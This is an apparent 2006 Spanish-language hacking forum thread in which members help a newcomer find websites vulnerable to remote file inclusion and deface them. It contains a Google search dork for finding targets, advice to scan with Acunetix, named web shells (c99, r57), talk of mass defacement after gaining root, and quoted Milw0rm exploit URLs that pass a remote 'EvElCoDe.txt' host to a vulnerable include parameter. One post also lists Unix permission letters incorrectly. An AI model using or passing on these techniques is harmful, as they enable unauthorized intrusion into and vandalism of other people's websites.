hola, es mi primer post 
we aca va la pregunta ¿ hay alguna forma de buscar webs vulnerables a RFI q no sea poniendo "allinurl:?page"?

mmm primero selecciona la page y escanea con acuentix, ya te busco unos tutos o te hago unos videos...


Komtec1

a y otra ¿como hago para saver si tiene derechos de escritura?
bye!

Quote from: user0 on October 25, 2006, 09:38:32 PM
a y otra ¿como hago para saver si tiene derechos de escritura?
bye!

todo depende de la shell ke estes utilizando

tenes conocimientos de sistemas *NIX?? (linux, etc)
digo asi identificas los permisos xD

Los permisos son:
d : lectura
r : escritura
w : ejecución

Permisos de archivos en formato binario y octal.
Binario Octal Permisos
000 0 ---
001 1 --x
010 2 -w-
011 3 -wx
100 4 r--
101 5 r-x
110 6 rw-
111 7 rwx

por ejemplo puedes modificar todo si tienes permisos 777 ... mm pero todo es cuestion de ke keres defacear ... saludos

Quote from: FR34K on October 25, 2006, 11:58:10 PM
Los permisos son:
d : lectura
r : escritura
w : ejecución

Si no me equivoco era::

r: read
w: write
x: execution

No es necesario tener permisos de root para hacer un simple Deface pero para un Mass Deface si es necesario.

Quote from: porq69 on October 26, 2006, 12:04:42 AM
Si no me equivoco era::

r: read
w: write
x: execution

No es necesario tener permisos de root para hacer un simple Deface pero para un Mass Deface si es necesario.

te equivocas ..man ... si estas haciendo rfi ... y no tenes permisos de escritura .. o Safe mode como pensas modificarle el index?

no estoy hablando de deface mediante una inyeccion html tipo <h1>Yo te haxoree</h1> estoy hablando de deface con rfi (remote file inclusion) si keres te subo una shell a mi fto y proba cambiarme el index a ver si podes... saludos

Quote from: porq69 on October 26, 2006, 12:04:42 AM
No es necesario tener permisos de root para hacer un simple Deface pero para un Mass Deface si es necesario.

Lo q quise decir es q no es necesario tener privilegios de Root para hacer el Deface si con permisos de escritura es suficiente, aunque si consiges ser root podrias hacer deface a todas la paginas q se encuentran en el servidor.

Quote from: porq69 on October 26, 2006, 12:16:08 AM
Lo q quise decir es q no es necesario tener privilegios de Root para hacer el Deface si con permisos de escritura es suficiente, aunque si consiges ser root podrias hacer deface a todas la paginas q se encuentran en el servidor.

debo aprender a leer ... sorry

lo q quiero saber es: como me doy cuenta en q parte de la web meter la shell , las shell q tengo son la c99 y la r57
bye

si no me ekivoco va despues del   "="tushell"
pero como uds saben.. de deface se muy pokito xDD

Saludos..
Deyabu Roolz

Quote from: Deyabu Roolz on October 26, 2006, 06:01:13 PM
si no me ekivoco va despues del   "="tushell"
pero como uds saben.. de deface se muy pokito xDD

Saludos..
Deyabu Roolz

no, eso lo se lo que pregunto es si siempre va en el index o en otra parte?
bye

No necesariamente deve estar en el index, todo depende donde se encuentra el bug... Este bug de RFI es mayormente por errores de programacion, por ejemplo un error comun en php es:
<?
include ($url);
?> Nunca un progrtamador de php deve poner una variable dentro de un include...

Si vemos este RFI en Milw0rm podemos ver lo siguiente

#Exploit :
#
#http://localhost/path/include.php?path=http://EvElCoDe.txt?
#http://localhost/path/functions.php?path=http://EvElCoDe.txt?

Si pensamos por un momento en el error podemos sacar q el programador escribio

<?
include ($path);
?> en la q "path" seria la variable vulnerable por estar dentro de un include sin ningun tipo de filtrado.

lee aki hice una guia rapida de como detectar RFI    http://hackpr.net/foro/index.php?topic=5194.0

Muy bueno, gracias Fr34k...

  :DGRACIAS!!! a tods

Siempre hay q darle las gracias d lo mejor man!!

Fr3aK te felicito Grax por el Manual ! man!!